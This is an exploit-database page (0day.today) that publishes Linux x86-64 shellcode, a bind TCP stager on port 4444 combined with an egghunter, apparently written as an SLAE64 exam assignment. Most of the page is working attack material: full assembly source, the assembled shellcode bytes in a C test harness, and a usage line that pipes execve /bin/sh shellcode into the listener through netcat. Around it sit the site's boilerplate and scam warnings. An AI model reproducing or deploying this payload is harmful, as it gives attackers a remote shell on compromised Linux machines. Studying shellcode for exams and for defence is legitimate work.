0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
;Exam Assignment 3 ;implementation of egghunter ;Default egg = "deaddead" ; ;If connected the stager check of egg , if present execute the code ; ;You can send a maximum of 255 bytes (egg + code) ; ;if no egg , shellcode exit ; ;Christophe G SLAE64 - 1337 ; global _start jmp short _start _start_code : call rsi _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 41 xor rdx , rdx push rdx ; null into the stack push byte 0x29 ; syscall number 41 pop rax push byte 0x2 ; AF_INET pop rdi push byte 0x1 ; SOCK_STREAM pop rsi syscall ; copy socket descriptor to rdi for future use xchg rax , rdi ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = INADDR_ANY ; bzero(&server.sin_zero, 8) xor rax, rax push rax ; bzero(&server.sin_zero, 8) mov rbx , 0xffffffffa3eefffd ; move ip address , port 4444 , AF_INET (02) in one instruction (noted to remove null of ip address and AF_INET value) not rbx push rbx push rsp ; save rsp value into the stack , needed for rsi later ; bind(sock, (struct sockaddr *)&server, sockaddr_len) ; syscall number 49 push byte 0x31 ; (49) pop rax pop rsi ; retrieve value of rsp pushed into the stack before push byte 0x10 ; (16 bytes) sockaddr_len pop rdx syscall ; listen(sock, MAX_CLIENTS) ; syscall number 50 push byte 0x32 ; (50) pop rax push byte 0x2 ;MAX_CLIENTS pop rsi syscall ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) ; syscall number 43 push byte 0x2b ; Accept syscall pop rax sub rsp, 0x10 push rsp pop rsi ;(struct sockaddr *)&client push byte 0x10 push rsp pop rdx ; &sockaddr_len syscall ; store the client socket description mov r9, rax ; close parent push byte 0x3 pop rax syscall xchg rdi , r9 ; restore client socket description to rdi xor rsi , rsi dup2: push byte 0x21 pop rax ; duplicate sockets dup2 (new, old) in this case (stdin , stdout , stderr); three times loop syscall inc rsi cmp rsi , 0x3 ; go in the next couple of instruction if equals loopne dup2 xor rsi , rsi mul rsi xor rdi , rdi sub spl , 0xff mov rsi , rsp mov dl , 0xff syscall Inc_rsi: cmp dil , 0xff jz Exit inc rsi inc rdi cmp [rsi - 4] , dword 0x64616564 ; egghunter jnz Inc_rsi cmp [rsi - 8] , dword 0x64616564 jnz Inc_rsi jz _start_code Exit: push byte 0x3c pop rax syscall ------------------------------------------------------------------------------------------------------------------------------------------------ Usage : Execve Shellcode #(echo -ne "\x68\x85\x11\x47\x02\x64\x65\x61\x64\x64\x65\x61\x64\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43" ; cat) | nc localhost 4444 "x68\x85\x11\x47\x02" -->> dumm bytes "\x64\x65\x61\x64\x64\x65\x61\x64" -->> egg (deaddead) "\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10" "\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff" -->> shellcode Execve JCP "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42" "\x42\x43\x43\x43\x43\x43\x43\x43\x43" --------------------------------------------------------------------------------------------------------------------------------------------------- Shellcode : #include <stdio.h> #include <string.h> unsigned char stager[] = \ "\xeb\x02\xff\xd6\x48\x31\xd2\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\x31\xc0\x50\x48\xc7\xc3\xfd\xff\xee\xa3\x48\xf7\xd3\x53\x54\x6a\x31\x58\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\xe0\xf2\x48\x31\xf6\x48\xf7\xe6\x48\x31\xff\x40\x80\xec\xff\x48\x89\xe6\xb2\xff\x0f\x05\x40\x80\xff\xff\x74\x1e\x48\xff\xc6\x48\xff\xc7\x81\x7e\xfc\x64\x65\x61\x64\x75\xeb\x81\x7e\xf8\x64\x65\x61\x64\x75\xe2\x0f\x84\x6a\xff\xff\xff\x6a\x3c\x58\x0f\x05"; int main() { printf("Stager Length: %d\n", (int)strlen(stager)); (*(void (*)()) stager)(); } # 0day.today [2024-09-29] #